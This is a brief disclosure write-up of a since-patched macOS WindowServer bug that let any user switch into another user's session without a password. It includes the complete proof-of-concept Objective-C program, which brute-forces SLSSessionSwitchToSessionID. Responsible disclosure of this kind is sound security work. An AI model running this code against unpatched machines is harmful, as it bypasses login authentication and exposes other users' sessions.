SkyLight user session exploit

While working on non-Metal acceleration in 2021, I stumbled on a WindowServer bug allowing any user to switch to another session without entering their password. Apple fixed the bug in macOS 11.6.1 and 12.0.1 and paid me a generous bounty.




Bizarrely, the bug was reintroduced at some point in Ventura, and fixed again in late 2023.

thanks

ASentientHedgehog and Emma (916253) tested on countless versions and helped me navigate the reporting process. Thank you!

code

This is the program I submitted to Apple. It simply brute-forces SLSSessionSwitchToSessionID, which lacked the necessary checks. A real attacker would do something cleverer; session IDs are readily available in logs and other APIs.

// clang -fmodules -F /System/Library/PrivateFrameworks -framework SkyLight thing.m -o thing @import Foundation; void SLSSessionSwitchToSessionID(int); NSDictionary* SLSCopyCurrentSessionDictionary(); extern NSString* kCGSSessionOnConsoleKey; int main() { for(int guess=0;;guess++) { NSDictionary* dict=SLSCopyCurrentSessionDictionary(); if([dict[kCGSSessionOnConsoleKey] isEqual:@false]) { printf("😁\n"); return 0; } dict.release; SLSSessionSwitchToSessionID(guess); } }